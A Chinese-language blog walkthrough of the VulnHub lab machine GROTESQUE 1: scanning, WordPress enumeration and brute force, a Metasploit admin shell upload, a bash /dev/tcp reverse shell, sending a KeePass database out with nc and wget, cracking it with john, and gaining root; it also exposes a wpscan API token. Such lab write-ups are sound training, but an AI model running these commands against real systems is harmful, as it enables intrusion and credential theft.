



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="X_T" href="http://n1h1l157.github.io/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="X_T" href="http://n1h1l157.github.io/atom.xml" />
<link rel="alternate" type="application/json" title="X_T" href="http://n1h1l157.github.io/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="VULNHUB 31-40" />


<link rel="canonical" href="http://n1h1l157.github.io/2023/07/01/VULNHUB/136%20GROTESQUE1/">



  <title>
VULNHUB GROTESQUE1 - VULNHUB |
Phut Hon = X_T = 天行健，君子以自强不息</title>
<meta name="generator" content="Hexo 6.3.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">VULNHUB GROTESQUE1
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2023-07-01 00:00:00">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2023-07-01T00:00:00+08:00">2023-07-01</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>3.2k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>5 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Phut Hon</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/lO78YkmNuUB9rZ1.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/ACqEVOecQP5RyuK.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/ukLG5BwF6jH1ONA.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/9RqJ7SolMrGZxmj.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/vGCLbdJPMhuwg3H.jpg"></li>
          <li class="item" data-background-image="https://s2.loli.net/2023/04/01/X1rsLTk5JUecDzf.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/VULNHUB/" itemprop="item" rel="index" title="分类于 VULNHUB"><span itemprop="name">VULNHUB</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="http://n1h1l157.github.io/2023/07/01/VULNHUB/136%20GROTESQUE1/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content=".N1h1l157">
    <meta itemprop="description" content="天行健，君子以自强不息, 人生如逆旅，我亦是行人">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="X_T">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>靶机下载地址: <span class="exturl" data-url="aHR0cHM6Ly93d3cudnVsbmh1Yi5jb20vZW50cnkvZ3JvdGVzcXVlLTEwMSw2NTgv">https://www.vulnhub.com/entry/grotesque-101,658/</span><br>
 教程链接地址: <span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1BlcnBldHVhbF9CbHVlL2FydGljbGUvZGV0YWlscy8xMjQ1NDE4OTM=">https://blog.csdn.net/Perpetual_Blue/article/details/124541893</span></p>
<h3 id="001-确认攻击目标的财产信息"><a class="markdownIt-Anchor" href="#001-确认攻击目标的财产信息">#</a> 001 确认攻击目标的财产信息</h3>
<p>攻击机 kali： 1 92.168.31. 73<br>
 靶机 GROTESQUE1：桥接于 1 92.168.31.1 的网卡，ip 未知</p>
<p>1 ）确定靶机 ip 地址和开放的端口<br>
 sudo arp-scan -l &gt; 1.txt ; cat 1.txt | grep ‘a0’ &gt; 2.txt ; rm -f 1.txt ; cat 2.txt | awk ‘{print<br>
$1}’ &gt; ip.txt; rm -f 2.txt; sudo nmap -PA -iL ip.txt;rm -f ip.txt</p>
<p>à 靶机 ip：192.168.31.29、靶机开放端口 80</p>
<p>2 ）再次确认开放端口</p>
<h3 id="识别到的-80-端口没有其他的端口感觉是有问题的因为这种情况很少能侵"><a class="markdownIt-Anchor" href="#识别到的-80-端口没有其他的端口感觉是有问题的因为这种情况很少能侵">#</a> 识别到的 80 端口，没有其他的端口，感觉是有问题的，因为这种情况很少能侵</h3>
<h3 id="入到系统需要再次进行扫描判断结果是否正确"><a class="markdownIt-Anchor" href="#入到系统需要再次进行扫描判断结果是否正确">#</a> 入到系统，需要再次进行扫描判断结果是否正确</h3>
<p>à 靶机开放端口 66 、 80</p>
<h3 id="002-信息收集sort使用wordpress测试"><a class="markdownIt-Anchor" href="#002-信息收集sort使用wordpress测试">#</a> 002 信息收集，sort 使用，wordpress 测试</h3>
<p>打开 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEu">http://192.168.31.</span> 29 / 进行信息收集</p>
<p>先用 gobuster 进行一波目录扫描<br>
 gobuster dir -x php,txt,html,zip,rar,jpg,png -w /usr/share/wordlists/dirbuster/directory-<br>
list-2.3-medium.txt -u <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEu">http://192.168.31.</span> 2 9/</p>
<h3 id="80-端口可以放弃了开始把目标放在-66-端口上"><a class="markdownIt-Anchor" href="#80-端口可以放弃了开始把目标放在-66-端口上">#</a> 80 端口可以放弃了，开始把目标放在 66 端口上</h3>
<p>打开 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEu">http://192.168.31.</span> 29 : 66 / 进行信息收集</p>
<h3 id="看到有个地址可以直接下载项目地址这里我们直接点击下载"><a class="markdownIt-Anchor" href="#看到有个地址可以直接下载项目地址这里我们直接点击下载">#</a> 看到有个地址可以直接下载项目地址，这里我们直接点击下载</h3>
<h3 id="这么多文件一眼看去只有几个是-1-18号的文件先对这几个文件测试"><a class="markdownIt-Anchor" href="#这么多文件一眼看去只有几个是-1-18号的文件先对这几个文件测试">#</a> 这么多文件，一眼看去只有几个是 1 .18 号的文件，先对这几个文件测试</h3>
<h3 id="按日期这一列对这些文件进行排序输入如下命令"><a class="markdownIt-Anchor" href="#按日期这一列对这些文件进行排序输入如下命令">#</a> 按日期这一列对这些文件进行排序，输入如下命令</h3>
<p>ls - Alh | sort -k 7</p>
<h3 id="接下来就依次看看这几个文件"><a class="markdownIt-Anchor" href="#接下来就依次看看这几个文件">#</a> 接下来就依次看看这几个文件</h3>
<p>cat assets/* | sort | uniq</p>
<h3 id="一堆乱码是没有价值的信息"><a class="markdownIt-Anchor" href="#一堆乱码是没有价值的信息">#</a> 一堆乱码，是没有价值的信息</h3>
<p>cat <span class="exturl" data-url="aHR0cDovL2luZGV4Lm1k">index.md</span></p>
<h3 id="这个文件没有有价值的信息"><a class="markdownIt-Anchor" href="#这个文件没有有价值的信息">#</a> 这个文件没有有价值的信息</h3>
<p>cat _vvmlist | sort | uniq</p>
<p>在这个文件中找到了一个 wordpress 的站点</p>
<p>打开 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMjkv">http://192.168.31.29/</span>lyricsblog 进行信息收集</p>
<p>直接用 wpscan 工具对 wordpress 站点进行扫描<br>
 wpscan --api-token eG5iT4ooiuP7eVJVedsHhlgx8xeZHmAJjBr13asnjEc --url<br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMjkvbHlyaWNzYmxvZy8=">http://192.168.31.29/lyricsblog/</span> - e</p>
<p>得到一个用户名 erdalkomurcu</p>
<p>指定用户为 erdalkomurcu 进行密码爆破<br>
 wpscan --api-token eG5iT4ooiuP7eVJVedsHhlgx8xeZHmAJjBr13asnjEc --url<br>
<span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMjkvbHlyaWNzYmxvZy8=">http://192.168.31.29/lyricsblog/</span> - U erdalkomurcu -P<br>
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</p>
<h3 id="密码爆破了很长时间都没成功可能是一个复杂密码"><a class="markdownIt-Anchor" href="#密码爆破了很长时间都没成功可能是一个复杂密码">#</a> 密码爆破了很长时间都没成功，可能是一个复杂密码</h3>
<h3 id="从工具出发没有找到那么我们就从常规的目录扫描进行测试"><a class="markdownIt-Anchor" href="#从工具出发没有找到那么我们就从常规的目录扫描进行测试">#</a> 从工具出发没有找到，那么我们就从常规的目录扫描进行测试</h3>
<p>一些常规的目录，没有什么特殊的，就是有一个 login 地址</p>
<h3 id="既然工具和目录扫描都没有发现可疑的信息可以尝试去检查一些源代码看"><a class="markdownIt-Anchor" href="#既然工具和目录扫描都没有发现可疑的信息可以尝试去检查一些源代码看">#</a> 既然工具和目录扫描都没有发现可疑的信息，可以尝试去检查一些源代码，看</h3>
<h3 id="看靶机作者有没有遗留一些提示给我们"><a class="markdownIt-Anchor" href="#看靶机作者有没有遗留一些提示给我们">#</a> 看靶机作者有没有遗留一些提示给我们</h3>
<p>查看 wordpress 首页的源代码 <span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEuMTkvbHlyaWNzYmxvZy8=">http://192.168.31.19/lyricsblog/</span></p>
<h3 id="访问这个网址得到一个文件"><a class="markdownIt-Anchor" href="#访问这个网址得到一个文件">#</a> 访问这个网址，得到一个文件</h3>
<p><span class="exturl" data-url="aHR0cDovLzE5Mi4xNjguMzEu">http://192.168.31.</span> 2 9/lyricsblog/yesman.png</p>
<h3 id="线索到这里就断了这个图片并没有什么利用价值-但是我们可以肯定的是"><a class="markdownIt-Anchor" href="#线索到这里就断了这个图片并没有什么利用价值-但是我们可以肯定的是">#</a> 线索到这里就断了，这个图片并没有什么利用价值。但是我们可以肯定的是，</h3>
<p>线索一定是存在在 wordpres 这个站点上的。接下来我们就手动翻一翻网页，看<br>
上面有没有什么线索。</p>
<h3 id="003-md5sum加密文件awk将文件内容转大写"><a class="markdownIt-Anchor" href="#003-md5sum加密文件awk将文件内容转大写">#</a> 003 md5sum 加密文件，awk 将文件内容转大写</h3>
<h3 id="观察上边的图片对比在站点上找到的页面发现了一个巧合点"><a class="markdownIt-Anchor" href="#观察上边的图片对比在站点上找到的页面发现了一个巧合点">#</a> 观察上边的图片，对比在站点上找到的页面，发现了一个巧合点</h3>
<h3 id="此图片顶头有个-yesi-enjoy-hakan-tasiyan"><a class="markdownIt-Anchor" href="#此图片顶头有个-yesi-enjoy-hakan-tasiyan">#</a> 此图片顶头有个 YES,I ENJOY HAKAN TASIYAN</h3>
<p>网页上有一段标题为 Hakan Taşıyan – Doktor<br>
 可能突破点就在于这个点</p>
<h3 id="进到这个页面之后这里有三段文字"><a class="markdownIt-Anchor" href="#进到这个页面之后这里有三段文字">#</a> 进到这个页面之后，这里有三段文字</h3>
<h3 id="是不是有联系将不带标题的段落文本复制到文本文件中并保存"><a class="markdownIt-Anchor" href="#是不是有联系将不带标题的段落文本复制到文本文件中并保存">#</a> 是不是有联系，将不带标题的段落文本复制到文本文件中并保存</h3>
<h3 id="计算并检查-md5-消息摘要"><a class="markdownIt-Anchor" href="#计算并检查-md5-消息摘要">#</a> 计算并检查 MD5 消息摘要</h3>
<p>在后台处尝试登陆，用户名为 wpscan 破解出来的，密码就用此 md 5 数据</p>
<p>登陆失败，将 md 5 数据由小写变为大写再次尝试<br>
 cat md5.txt | awk ‘{print toupper ($0)}’ &gt;&gt; MD5.txt</p>
<p>再次登陆此网址 http://192.168.31.19/lyricsblog/wp-login.php<br>
 由密码 BC 78 C6AB38E114D 61354 09E 44 F 7 CDDA2 成功进入</p>
<h3 id="后台页面显示如下"><a class="markdownIt-Anchor" href="#后台页面显示如下">#</a> 后台页面显示如下</h3>
<h3 id="004-msf攻击wordpressmeterpreter交接shell"><a class="markdownIt-Anchor" href="#004-msf攻击wordpressmeterpreter交接shell">#</a> 004 msf 攻击 wordpress，meterpreter 交接 shell</h3>
<p>可以搜索 wordpress 相关版本查看相关漏洞，查看版本之后用 msf 反弹 shell<br>
use exploit/unix/webapp/wp_admin_shell_upload<br>
set password BC78C6AB38E114D6135409E44F7CDDA2<br>
set rhosts 192.168.31.29<br>
set username erdalkomurcu<br>
set targeturi /lyricsblog</p>
<p>options 检查如下参数</p>
<p>run 开始执行 wordpress 的攻击，成功拿到靶机的 webshell</p>
<p>将 msf 的 shell 反弹出来进行美化便于操作<br>
 bash -c ‘bash -i &gt;&amp; /dev/tcp/192.168.31.75/4445 0&gt;&amp;1’<br>
nc -lvvp 4445</p>
<h3 id="005-config文件提权传输文件总结keepass解密"><a class="markdownIt-Anchor" href="#005-config文件提权传输文件总结keepass解密">#</a> 005 config 文件提权，传输文件总结，keepass 解密</h3>
<p>翻阅服务器的相关文件，看到 config 配置文件，找到了数据库用户名和密码<br>
并且 /etc/passwd 中是用 raphael 这个用户的<br>
 su raphael:<em>double_trouble</em></p>
<p>注意到此用户根目录下有一个隐藏文件.chadroot.kdbx<br>
KeePass 是一款免费的开源密码管理器，可帮助您以安全的方式管理您的密码。<br>
您可以将所有密码存储在一个数据库中，该数据库由主密钥锁定。因此，您只需<br>
记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全<br>
的加密算法（AES- 256 、ChaCha20 和 Twofish）进行加密。</p>
<p>Keepass 存在漏洞，把其传到 kali 机器上，有多种传输方式<br>
 scp -P22 <span class="exturl" data-url="bWFpbHRvOnBhcmFsbGVsc0AxOTIuMTY4LjMxLjcz">parallels@192.168.31.73</span>:/home/parallels/Desktop/tmp/.chadroot.kdbx.</p>
<p>nc 192.168.31.73 4446 &lt; .chadroot.kdbx</p>
<p>python3 -m http.server 80 00<br>
wget 192.168.31.29/.chadroot.kdbx -O 2.kdbx</p>
<p>用 keepass2john 将 kdbx 后缀的文件转化为 john 能破解的格式并破解<br>
 keepass2john .chadroot.kdbx &gt; chadroot<br>
john --wordlist=/usr/share/wordlists/rockyou.txt chadroot</p>
<p>此处破解的密码应该是：chatter</p>
<p>登陆网站 <span class="exturl" data-url="aHR0cHM6Ly9hcHAua2Vld2ViLmluZm8v">https://app.keeweb.info/</span> 输入 chatter 进入</p>
<p>得到如下界面，每一个页面里边都有一个 root 对应的密码，这四个密码分别<br>
是 .:.yarak.:./sercertservice/.:.subjective.:./rockyou.txt</p>
<p>在服务器里边分别尝试这四个 root 的密码是否正确</p>
<p>输入密码.:.subjective.:. 时成功拿到 root 权限</p>

      <div class="tags">
          <a href="/tags/VULNHUB-31-40/" rel="tag"><i class="ic i-tag"></i> VULNHUB 31-40</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-07-03 18:02:28" itemprop="dateModified" datetime="2023-07-03T18:02:28+08:00">2023-07-03</time>
  </span>
  <span id="2023/07/01/VULNHUB/136 GROTESQUE1/" class="item leancloud_visitors" data-flag-title="VULNHUB GROTESQUE1" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt=".N1h1l157 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt=".N1h1l157 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt=".N1h1l157 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>.N1h1l157 <i class="ic i-at"><em>@</em></i>X_T
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://n1h1l157.github.io/2023/07/01/VULNHUB/136%20GROTESQUE1/" title="VULNHUB GROTESQUE1">http://n1h1l157.github.io/2023/07/01/VULNHUB/136 GROTESQUE1/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2023/07/01/VULNHUB/137%20VENUS/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;R6S5zNpXVctWQqT.jpg" title="VULNHUB VENUS">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB VENUS</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2023/07/01/VULNHUB/135%20HACKABLE3/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2023&#x2F;04&#x2F;01&#x2F;YxVAkEwQdF9thjc.jpg" title="VULNHUB HACKABLE3">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> VULNHUB</span>
  <h3>VULNHUB HACKABLE3</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#001-%E7%A1%AE%E8%AE%A4%E6%94%BB%E5%87%BB%E7%9B%AE%E6%A0%87%E7%9A%84%E8%B4%A2%E4%BA%A7%E4%BF%A1%E6%81%AF"><span class="toc-number">1.</span> <span class="toc-text"> 001 确认攻击目标的财产信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AF%86%E5%88%AB%E5%88%B0%E7%9A%84-80-%E7%AB%AF%E5%8F%A3%E6%B2%A1%E6%9C%89%E5%85%B6%E4%BB%96%E7%9A%84%E7%AB%AF%E5%8F%A3%E6%84%9F%E8%A7%89%E6%98%AF%E6%9C%89%E9%97%AE%E9%A2%98%E7%9A%84%E5%9B%A0%E4%B8%BA%E8%BF%99%E7%A7%8D%E6%83%85%E5%86%B5%E5%BE%88%E5%B0%91%E8%83%BD%E4%BE%B5"><span class="toc-number">2.</span> <span class="toc-text"> 识别到的 80 端口，没有其他的端口，感觉是有问题的，因为这种情况很少能侵</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A5%E5%88%B0%E7%B3%BB%E7%BB%9F%E9%9C%80%E8%A6%81%E5%86%8D%E6%AC%A1%E8%BF%9B%E8%A1%8C%E6%89%AB%E6%8F%8F%E5%88%A4%E6%96%AD%E7%BB%93%E6%9E%9C%E6%98%AF%E5%90%A6%E6%AD%A3%E7%A1%AE"><span class="toc-number">3.</span> <span class="toc-text"> 入到系统，需要再次进行扫描判断结果是否正确</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#002-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86sort%E4%BD%BF%E7%94%A8wordpress%E6%B5%8B%E8%AF%95"><span class="toc-number">4.</span> <span class="toc-text"> 002 信息收集，sort 使用，wordpress 测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#80-%E7%AB%AF%E5%8F%A3%E5%8F%AF%E4%BB%A5%E6%94%BE%E5%BC%83%E4%BA%86%E5%BC%80%E5%A7%8B%E6%8A%8A%E7%9B%AE%E6%A0%87%E6%94%BE%E5%9C%A8-66-%E7%AB%AF%E5%8F%A3%E4%B8%8A"><span class="toc-number">5.</span> <span class="toc-text"> 80 端口可以放弃了，开始把目标放在 66 端口上</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9C%8B%E5%88%B0%E6%9C%89%E4%B8%AA%E5%9C%B0%E5%9D%80%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E4%B8%8B%E8%BD%BD%E9%A1%B9%E7%9B%AE%E5%9C%B0%E5%9D%80%E8%BF%99%E9%87%8C%E6%88%91%E4%BB%AC%E7%9B%B4%E6%8E%A5%E7%82%B9%E5%87%BB%E4%B8%8B%E8%BD%BD"><span class="toc-number">6.</span> <span class="toc-text"> 看到有个地址可以直接下载项目地址，这里我们直接点击下载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%99%E4%B9%88%E5%A4%9A%E6%96%87%E4%BB%B6%E4%B8%80%E7%9C%BC%E7%9C%8B%E5%8E%BB%E5%8F%AA%E6%9C%89%E5%87%A0%E4%B8%AA%E6%98%AF-1-18%E5%8F%B7%E7%9A%84%E6%96%87%E4%BB%B6%E5%85%88%E5%AF%B9%E8%BF%99%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6%E6%B5%8B%E8%AF%95"><span class="toc-number">7.</span> <span class="toc-text"> 这么多文件，一眼看去只有几个是 1 .18 号的文件，先对这几个文件测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8C%89%E6%97%A5%E6%9C%9F%E8%BF%99%E4%B8%80%E5%88%97%E5%AF%B9%E8%BF%99%E4%BA%9B%E6%96%87%E4%BB%B6%E8%BF%9B%E8%A1%8C%E6%8E%92%E5%BA%8F%E8%BE%93%E5%85%A5%E5%A6%82%E4%B8%8B%E5%91%BD%E4%BB%A4"><span class="toc-number">8.</span> <span class="toc-text"> 按日期这一列对这些文件进行排序，输入如下命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A5%E4%B8%8B%E6%9D%A5%E5%B0%B1%E4%BE%9D%E6%AC%A1%E7%9C%8B%E7%9C%8B%E8%BF%99%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6"><span class="toc-number">9.</span> <span class="toc-text"> 接下来就依次看看这几个文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E5%A0%86%E4%B9%B1%E7%A0%81%E6%98%AF%E6%B2%A1%E6%9C%89%E4%BB%B7%E5%80%BC%E7%9A%84%E4%BF%A1%E6%81%AF"><span class="toc-number">10.</span> <span class="toc-text"> 一堆乱码，是没有价值的信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%99%E4%B8%AA%E6%96%87%E4%BB%B6%E6%B2%A1%E6%9C%89%E6%9C%89%E4%BB%B7%E5%80%BC%E7%9A%84%E4%BF%A1%E6%81%AF"><span class="toc-number">11.</span> <span class="toc-text"> 这个文件没有有价值的信息</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4%E4%BA%86%E5%BE%88%E9%95%BF%E6%97%B6%E9%97%B4%E9%83%BD%E6%B2%A1%E6%88%90%E5%8A%9F%E5%8F%AF%E8%83%BD%E6%98%AF%E4%B8%80%E4%B8%AA%E5%A4%8D%E6%9D%82%E5%AF%86%E7%A0%81"><span class="toc-number">12.</span> <span class="toc-text"> 密码爆破了很长时间都没成功，可能是一个复杂密码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%8E%E5%B7%A5%E5%85%B7%E5%87%BA%E5%8F%91%E6%B2%A1%E6%9C%89%E6%89%BE%E5%88%B0%E9%82%A3%E4%B9%88%E6%88%91%E4%BB%AC%E5%B0%B1%E4%BB%8E%E5%B8%B8%E8%A7%84%E7%9A%84%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E8%BF%9B%E8%A1%8C%E6%B5%8B%E8%AF%95"><span class="toc-number">13.</span> <span class="toc-text"> 从工具出发没有找到，那么我们就从常规的目录扫描进行测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A2%E7%84%B6%E5%B7%A5%E5%85%B7%E5%92%8C%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%E9%83%BD%E6%B2%A1%E6%9C%89%E5%8F%91%E7%8E%B0%E5%8F%AF%E7%96%91%E7%9A%84%E4%BF%A1%E6%81%AF%E5%8F%AF%E4%BB%A5%E5%B0%9D%E8%AF%95%E5%8E%BB%E6%A3%80%E6%9F%A5%E4%B8%80%E4%BA%9B%E6%BA%90%E4%BB%A3%E7%A0%81%E7%9C%8B"><span class="toc-number">14.</span> <span class="toc-text"> 既然工具和目录扫描都没有发现可疑的信息，可以尝试去检查一些源代码，看</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9C%8B%E9%9D%B6%E6%9C%BA%E4%BD%9C%E8%80%85%E6%9C%89%E6%B2%A1%E6%9C%89%E9%81%97%E7%95%99%E4%B8%80%E4%BA%9B%E6%8F%90%E7%A4%BA%E7%BB%99%E6%88%91%E4%BB%AC"><span class="toc-number">15.</span> <span class="toc-text"> 看靶机作者有没有遗留一些提示给我们</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E8%BF%99%E4%B8%AA%E7%BD%91%E5%9D%80%E5%BE%97%E5%88%B0%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6"><span class="toc-number">16.</span> <span class="toc-text"> 访问这个网址，得到一个文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%BA%BF%E7%B4%A2%E5%88%B0%E8%BF%99%E9%87%8C%E5%B0%B1%E6%96%AD%E4%BA%86%E8%BF%99%E4%B8%AA%E5%9B%BE%E7%89%87%E5%B9%B6%E6%B2%A1%E6%9C%89%E4%BB%80%E4%B9%88%E5%88%A9%E7%94%A8%E4%BB%B7%E5%80%BC-%E4%BD%86%E6%98%AF%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E8%82%AF%E5%AE%9A%E7%9A%84%E6%98%AF"><span class="toc-number">17.</span> <span class="toc-text"> 线索到这里就断了，这个图片并没有什么利用价值。但是我们可以肯定的是，</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#003-md5sum%E5%8A%A0%E5%AF%86%E6%96%87%E4%BB%B6awk%E5%B0%86%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%E8%BD%AC%E5%A4%A7%E5%86%99"><span class="toc-number">18.</span> <span class="toc-text"> 003 md5sum 加密文件，awk 将文件内容转大写</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%82%E5%AF%9F%E4%B8%8A%E8%BE%B9%E7%9A%84%E5%9B%BE%E7%89%87%E5%AF%B9%E6%AF%94%E5%9C%A8%E7%AB%99%E7%82%B9%E4%B8%8A%E6%89%BE%E5%88%B0%E7%9A%84%E9%A1%B5%E9%9D%A2%E5%8F%91%E7%8E%B0%E4%BA%86%E4%B8%80%E4%B8%AA%E5%B7%A7%E5%90%88%E7%82%B9"><span class="toc-number">19.</span> <span class="toc-text"> 观察上边的图片，对比在站点上找到的页面，发现了一个巧合点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" 